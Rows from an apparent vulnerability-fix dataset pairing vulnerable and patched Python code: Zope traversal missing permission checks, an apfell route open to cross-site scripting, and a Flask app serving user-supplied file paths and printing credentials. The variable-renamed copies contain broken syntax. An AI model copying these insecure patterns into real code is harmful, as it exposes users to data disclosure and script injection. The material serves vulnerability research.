return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| """``chameleon.tales`` expressions."""
import warnings
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
validate = getSecurityManager().validate
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if ITraversable.providedBy(base):
base = getattr(base, cls.traverse_method)(name)
else:
found = traversePathElement(base, name, path_items,
request=request)
# If traverse_method is something other than
# ``restrictedTraverse`` then traversal is assumed to be
# unrestricted. This emulates ``unrestrictedTraverse``
if cls.traverse_method != 'restrictedTraverse':
base = found
continue
# Special backwards compatibility exception for the name ``_``,
# which was often used for translation message factories.
# Allow and continue traversal.
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
base = found
continue
# All other names starting with ``_`` are disallowed.
# This emulates what restrictedTraverse does.
if name.startswith('_'):
raise NotFound(name)
# traversePathElement doesn't apply any Zope security policy,
# so we validate access explicitly here.
try:
validate(base, base, name, found)
base = found
except Unauthorized:
# Convert Unauthorized to prevent information disclosures
raise NotFound(name)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| path_disclosure | {
"code": [
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" 'and will be removed in Zope 6.',",
" DeprecationWarning)",
" elif name.startswith('_'):",
" raise NotFound(name)",
" base = traversePathElement(base, name, path_items,",
" request=request)"
],
"line_no": [
66,
67,
68,
69,
70,
71,
76,
77
]
} | {
"code": [
"from AccessControl.SecurityManagement import getSecurityManager",
" validate = getSecurityManager().validate",
" found = traversePathElement(base, name, path_items,",
" if cls.traverse_method != 'restrictedTraverse':",
" continue",
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" DeprecationWarning)",
" base = found",
" if name.startswith('_'):",
" raise NotFound(name)",
" try:",
" base = found",
" raise NotFound(name)"
],
"line_no": [
13,
61,
71,
77,
79,
84,
85,
87,
88,
93,
94,
98,
100,
103
]
} |
import warnings
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_30 = VAR_12.pop()
if VAR_30 == '_':
warnings.warn('Traversing to the VAR_30 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif VAR_30.startswith('_'):
raise NotFound(VAR_30)
if ITraversable.providedBy(VAR_10):
VAR_10 = getattr(VAR_10, VAR_9.traverse_method)(VAR_30)
else:
VAR_10 = traversePathElement(VAR_10, VAR_30, VAR_12,
VAR_11=request)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_28 = self.secured.get(VAR_18.id)
if VAR_28 is not None:
return Symbol(VAR_28)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_30: FUNC_0(builtin) for (VAR_30, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_29 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_29, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
|
import warnings
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_28 = getSecurityManager().validate
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_31 = VAR_12.pop()
if ITraversable.providedBy(VAR_10):
base = getattr(VAR_10, VAR_9.traverse_method)(VAR_31)
else:
VAR_32 = traversePathElement(VAR_10, VAR_31, VAR_12,
VAR_11=request)
if VAR_9.traverse_method != 'restrictedTraverse':
VAR_10 = VAR_32
continue
if VAR_31 == '_':
warnings.warn('Traversing to the VAR_31 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
VAR_10 = VAR_32
continue
if VAR_31.startswith('_'):
raise NotFound(VAR_31)
try:
VAR_28(VAR_10, VAR_10, VAR_31, VAR_32)
VAR_10 = VAR_32
except Unauthorized:
raise NotFound(VAR_31)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_29 = self.secured.get(VAR_18.id)
if VAR_29 is not None:
return Symbol(VAR_29)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_31: FUNC_0(builtin) for (VAR_31, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_30 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_30, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
| [
2,
6,
12,
28,
31,
32,
34,
45,
46,
49,
50,
53,
55,
59,
62,
65,
72,
78,
80,
83,
86,
89,
93,
95,
96,
99,
101,
104,
106,
109,
113,
115,
116,
119,
123,
124,
129,
130,
133,
134,
137,
138,
147,
152,
154,
155,
159,
160,
162,
163,
167,
171,
172,
174,
175,
177,
179,
180,
181,
182,
183,
184,
185,
189,
194,
195,
204,
205,
208,
211,
223,
224,
229,
230,
232,
233,
236,
237,
239,
240,
243,
1,
188,
189,
190,
191,
58
] | [
2,
6,
12,
29,
32,
33,
35,
46,
47,
50,
51,
54,
56,
60,
64,
67,
73,
74,
75,
76,
80,
81,
82,
83,
90,
91,
92,
95,
96,
97,
102,
104,
106,
109,
112,
115,
119,
121,
122,
125,
127,
130,
132,
135,
139,
141,
142,
145,
149,
150,
155,
156,
159,
160,
163,
164,
173,
178,
180,
181,
185,
186,
188,
189,
193,
197,
198,
200,
201,
203,
205,
206,
207,
208,
209,
210,
211,
215,
220,
221,
230,
231,
234,
237,
249,
250,
255,
256,
258,
259,
262,
263,
265,
266,
269,
1,
214,
215,
216,
217,
59
] |
1CWE-79
| from app import apfell, links, use_ssl
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
env = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # user or user-level api token are ok
async def apiui_command_help(request, user):
template = env.get_template('apiui_command_help.html')
if len(request.query_args) != 0:
data = urllib.parse.unquote(request.query_args[0][1])
print(data)
else:
data = ""
if use_ssl:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="https",
ws="wss", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
else:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="http",
ws="ws", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
return response.html(content)
# add links to the routes in this file at the bottom
links['apiui_command_help'] = apfell.url_for('apiui_command_help')
| from app import apfell, links, use_ssl, db_objects
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
import app.database_models.model as db_model
env = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # user or user-level api token are ok
async def apiui_command_help(request, user):
template = env.get_template('apiui_command_help.html')
if len(request.query_args) != 0:
data = urllib.parse.unquote(request.query_args[0][1])
query = await db_model.payloadtype_query()
try:
payloadtype = await db_objects.get(query, ptype=data)
except Exception as e:
data = ""
else:
data = ""
if use_ssl:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="https",
ws="wss", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
else:
content = template.render(links=await respect_pivot(links, request), name=user['username'], http="http",
ws="ws", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)
return response.html(content)
# add links to the routes in this file at the bottom
links['apiui_command_help'] = apfell.url_for('apiui_command_help')
| xss | {
"code": [
"from app import apfell, links, use_ssl",
" print(data)"
],
"line_no": [
1,
18
]
} | {
"code": [
"from app import apfell, links, use_ssl, db_objects",
" query = await db_model.payloadtype_query()",
" try:",
" payloadtype = await db_objects.get(query, ptype=data)",
" except Exception as e:",
" data = \"\""
],
"line_no": [
1,
19,
20,
21,
22,
23
]
} | from app import apfell, VAR_3, use_ssl
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
VAR_0 = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # VAR_2 or VAR_2-level api token are ok
async def FUNC_0(VAR_1, VAR_2):
VAR_4 = VAR_0.get_template('apiui_command_help.html')
if len(VAR_1.query_args) != 0:
VAR_5 = urllib.parse.unquote(VAR_1.query_args[0][1])
print(VAR_5)
else:
VAR_5 = ""
if use_ssl:
VAR_6 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="https",
ws="wss", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
else:
VAR_6 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="http",
ws="ws", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
return response.html(VAR_6)
VAR_3['apiui_command_help'] = apfell.url_for('apiui_command_help')
| from app import apfell, VAR_3, use_ssl, db_objects
from sanic import response
from jinja2 import Environment, PackageLoader
from sanic_jwt.decorators import scoped, inject_user
from app.routes.routes import respect_pivot
import urllib.parse
import app.database_models.model as db_model
VAR_0 = Environment(loader=PackageLoader('app', 'templates'))
@apfell.route("/apiui/command_help")
@inject_user()
@scoped(['auth:user', 'auth:apitoken_user'], False) # VAR_2 or VAR_2-level api token are ok
async def FUNC_0(VAR_1, VAR_2):
VAR_4 = VAR_0.get_template('apiui_command_help.html')
if len(VAR_1.query_args) != 0:
VAR_5 = urllib.parse.unquote(VAR_1.query_args[0][1])
VAR_6 = await db_model.payloadtype_query()
try:
VAR_8 = await db_objects.get(VAR_6, ptype=VAR_5)
except Exception as e:
VAR_5 = ""
else:
VAR_5 = ""
if use_ssl:
VAR_7 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="https",
ws="wss", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
else:
VAR_7 = VAR_4.render(VAR_3=await respect_pivot(VAR_3, VAR_1), name=VAR_2['username'], http="http",
ws="ws", config=VAR_2['ui_config'], view_utc_time=VAR_2['view_utc_time'], agent=VAR_5)
return response.html(VAR_7)
VAR_3['apiui_command_help'] = apfell.url_for('apiui_command_help')
| [
7,
9,
10,
28,
29,
31
] | [
8,
10,
11,
33,
34,
36
] |
0CWE-22
| import configparser
from flask import Flask, render_template, session, request, flash, redirect, url_for, Response, abort, jsonify, send_file
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from app.common.decorator import return_500_if_errors
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
hostname = socket.gethostname()
isLocal = None
munhak_rows_data = None
if hostname[:7] == "DESKTOP":
isLocal = True
else:
isLocal = False
app = Flask(__name__)
def update():
gc = gspread.authorize(credentials).open("문학따먹기")
wks = gc.get_worksheet(0)
rows = wks.get_all_values()
print(rows)
try:
data = []
for row in rows[1:]:
row_tuple = namedtuple("Munhak", rows[0])(*row)
row_tuple = row_tuple._replace(keywords=json.loads(row_tuple.keywords))
if row_tuple.is_available == "TRUE":
data.append(row_tuple)
except:
pass
global munhak_rows_data
munhak_rows_data = data
print(data)
# print(munhak_rows)
return
if isLocal:
config = configparser.ConfigParser()
config.read('config.ini')
pg_db_username = config['DEFAULT']['LOCAL_DB_USERNAME']
pg_db_password = config['DEFAULT']['LOCAL_DB_PASSWORD']
pg_db_name = config['DEFAULT']['LOCAL_DB_NAME']
pg_db_hostname = config['DEFAULT']['LOCAL_DB_HOSTNAME']
app.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=pg_db_username,
DB_PASS=pg_db_password,
DB_ADDR=pg_db_hostname,
DB_NAME=pg_db_name)
app.config["SECRET_KEY"] = config['DEFAULT']['SECRET_KEY']
credentials = ServiceAccountCredentials.from_json_keyfile_name(config['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], scope)
else:
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
app.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
credentials = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), scope)
update()
@app.route('/')
def index():
munhak_rows = copy.deepcopy(munhak_rows_data)
data = {
"total_munhak" : len(munhak_rows),
"source_list" : sorted(set([munhak_row.source for munhak_row in munhak_rows]))
}
print(data)
session["quiz_count"] = 0
return render_template("quiz/index.html", data=data)
@app.route("/get-quiz")
def get_quiz():
if "quiz_count" not in session:
session["quiz_count"] = 0
session["total_munhak"] = len(munhak_rows_data)
if "solved_quiz" not in session:
session["solved_quiz"] = []
session["result"] = None
quiz_no = session["quiz_count"] + 1
solved_quiz = session["solved_quiz"]
if "current_munhak" not in session or session["current_munhak"] is None:
# munhak_rows = Munhak.query.filter_by(is_available=True).all()
munhak_rows = copy.deepcopy(munhak_rows_data)
not_solved_munhak_rows = [munhak_row for munhak_row in munhak_rows if munhak_row.munhak_seq not in solved_quiz]
if len(not_solved_munhak_rows) == 0:
session["result"] = True
return redirect(url_for("result"))
correct_munhak_row = random.choice(not_solved_munhak_rows)
for _ in [munhak_row for munhak_row in munhak_rows if munhak_row.title == correct_munhak_row.title]:
munhak_rows.remove(_)
random.shuffle(munhak_rows)
option_munhak_rows = munhak_rows[0:3] + [correct_munhak_row]
random.shuffle(option_munhak_rows)
correct = option_munhak_rows.index(correct_munhak_row)
print(correct)
# correct = random.randrange(0, 4)
#
# answer_row = not_solved_munhak_rows[correct]
#
session["correct"] = correct
hint = random.choice(correct_munhak_row.keywords)
hint = hint.replace("\\", "")
session["current_munhak"] = {
"munhak_seq": correct_munhak_row.munhak_seq,
"source": correct_munhak_row.source,
"category": correct_munhak_row.category,
"hint": hint,
"title": correct_munhak_row.title,
"writer": correct_munhak_row.writer
}
session["options"] = [munhak_row._asdict() for munhak_row in option_munhak_rows]
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": correct_munhak_row.category,
"hint": hint,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in option_munhak_rows
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
else:
# print(hint)
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": session["current_munhak"]["category"],
"hint": session["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in session["options"]
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
@app.route('/quiz')
def quiz():
return render_template("quiz/quiz_container.html")
@app.route("/answer", methods=["GET", "POST"])
def answer():
print(session)
option = request.form.get("option", None)
if option is None or (not type(option) != int):
return abort(400)
option = int(option)
correct = session["correct"]
if correct is None:
return abort(401)
current_munhak = session["current_munhak"]
if current_munhak is None:
return abort(401)
if correct == option:
session["quiz_count"] += 1
session["solved_quiz"].append(current_munhak["munhak_seq"])
session["current_munhak"] = None
# current_munhak = jsonify(current_munhak)
return "success"
else:
if "quiz_count" not in session:
session["quiz_count"] = 0
if "solved_quiz" not in session:
# session["solved_quiz"] = []
session["result"] = False
return "failed", 404
@app.route("/result", methods=["GET", "POST"])
def result():
is_success = session["result"]
data = {
"is_success" : is_success,
"solved_count" : session["quiz_count"],
"correct" : session["correct"],
"current_munhak" : session["current_munhak"]
}
session["quiz_count"] = 0
session["solved_quiz"] = []
session["current_munhak"] = None
print(data)
return render_template("quiz/result.html", data = data)
@app.route('/update')
def update_():
if request.args.get("key", None) != app.config["SECRET_KEY"]:
return "error"
update()
session.clear()
return f"success! {len(munhak_rows_data)}"
@app.route('/images/<path:path>')
def get_image(path):
def get_absolute_path(path):
import os
script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in
rel_path = path
abs_file_path = os.path.join(script_dir, rel_path)
return abs_file_path
return send_file(
get_absolute_path(f"./images/{path}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
app.run()
| import configparser
from flask import Flask, render_template, session, request, flash, redirect, url_for, Response, abort, jsonify, send_file
from werkzeug.utils import safe_join
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from app.common.decorator import return_500_if_errors
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
hostname = socket.gethostname()
isLocal = None
munhak_rows_data = None
if hostname[:7] == "DESKTOP":
isLocal = True
else:
isLocal = False
app = Flask(__name__)
def update():
gc = gspread.authorize(credentials).open("문학따먹기")
wks = gc.get_worksheet(0)
rows = wks.get_all_values()
print(rows)
try:
data = []
for row in rows[1:]:
row_tuple = namedtuple("Munhak", rows[0])(*row)
row_tuple = row_tuple._replace(keywords=json.loads(row_tuple.keywords))
if row_tuple.is_available == "TRUE":
data.append(row_tuple)
except:
pass
global munhak_rows_data
munhak_rows_data = data
print(data)
# print(munhak_rows)
return
if isLocal:
config = configparser.ConfigParser()
